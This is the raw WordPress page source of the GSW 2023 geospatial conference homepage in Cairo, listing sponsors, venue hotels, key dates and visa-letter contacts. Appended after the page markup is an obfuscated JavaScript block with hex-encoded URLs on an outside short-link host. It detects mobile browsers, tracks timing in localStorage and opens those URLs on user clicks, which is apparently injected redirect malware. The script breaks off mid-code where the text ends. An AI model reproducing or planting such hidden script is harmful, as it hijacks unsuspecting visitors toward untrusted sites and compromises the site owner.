wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687553155258{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 